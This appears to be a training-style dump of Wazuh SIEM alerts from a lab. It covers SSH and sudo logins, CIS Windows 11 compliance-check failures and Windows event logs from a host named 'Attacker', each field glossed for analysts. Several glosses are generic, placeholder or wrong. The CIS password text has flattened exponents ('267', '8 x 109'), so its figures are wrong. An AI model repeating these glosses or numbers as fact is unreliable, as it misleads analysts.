manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2374810 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:44.552511+00:00 server1 sshd[3469]: Accepted password for simba from 192.168.6.135 port 57242 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:44.552511+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcport: 57242 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2375277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26164 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32) Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19004 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534694.2380503 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: summary Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.description: This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11. No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.policy_id: cis_win11_enterprise_21H2 Internal numeric ID for that policy.
data.sca.passed: 126 Checks that were green – a quick confidence boost.
data.sca.failed: 260 Number of failed checks in the scan. Lots of red means poor hygiene.
data.sca.invalid: 9 Checks that couldn’t run (permissions, missing file, etc.).
data.sca.total_checks: 395 Total tests executed this run.
data.sca.score: 32 Overall compliance score 0‑100%. Under 85% usually needs remediation.
data.sca.file: cis_win11_enterprise.yml No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.5'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534694.2381818 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26004 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Password must meet complexity requirements' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting checks all new passwords to ensure that they meet basic requirements for strong passwords. When this policy is enabled, passwords must meet the following minimum requirements: - Not contain the user's account name or parts of the user's full name that exceed two consecutive characters - Be at least six characters in length - Contain characters from three of the following categories: - English uppercase characters (A through Z) - English lowercase characters (a through z) - Base 10 digits (0 through 9) - Non-alphabetic characters (for example, !, $, #, %) o A catch-all category of any Unicode character that does not fall under the previous four categories. This fifth category can be regionally specific. Each additional character in a password increases its complexity exponentially. For instance, a seven-character, all lower-case alphabetic password would have 267 (approximately 8 x 109 or 8 billion) possible combinations. At 1,000,000 attempts per second (a capability of many password-cracking utilities), it would only take 133 minutes to crack. A seven-character alphabetic password with case sensitivity has 527 combinations. A seven-character case-sensitive alphanumeric password without punctuation has 627 combinations. An eight-character password has 268 (or 2 x 1011) possible combinations. Although this might seem to be a large number, at 1,000,000 attempts per second it would take only 59 hours to try all possible passwords. Remember, these times will significantly increase for passwords that use ALT characters and other special keyboard characters such as '!'' or '@''. Proper use of the password settings can help make it difficult to mount a brute force attack. The recommended state for this setting is: Enabled. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Passwords that contain only alphanumeric characters are extremely easy to discover with several publicly available tools. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Password must meet complexity requirements Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2389057 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.791511+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.791511+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sudo Parent decoder used – for nested parsing.
decoder.name: sudo Name of the Wazuh decoder that parsed this raw log.
decoder.ftscomment: First time user executed the sudo command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: root No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.tty: pts/0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.pwd: /home/simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.command: /usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2389646 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.795776+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.795776+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: root(uid=0) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 1000 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534714.2390097 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:45:13.829022+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sudo Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:45:13.829022+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: root No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534757.2390482 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:44:43.8159628Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43949 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534819.2397819 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:45:44.7822583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2421 Incremental log record number – handy for timeline order.
data.win.system.processID: 10660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:44Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:44Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534826.2399401 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-WindowsUpdateClient No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {945a8954-c147-4acd-923f-40c45405a658} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 20 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 13 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000028 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:45:51.3230557Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3030 Incremental log record number – handy for timeline order.
data.win.system.processID: 9648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NMPJ99VJBWV-Microsoft.YourPhone." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.errorCode: 0x80073d02 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateTitle: 9NMPJ99VJBWV-Microsoft.YourPhone No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateGuid: {2eb475fe-568c-40c0-97c7-1b48d934a305} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateRevisionNumber: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceGuid: {855e8a7c-ecb4-4ca3-b045-1dfa50104289} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534843.2401275 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:46:11.7493654Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3035 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 7040 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
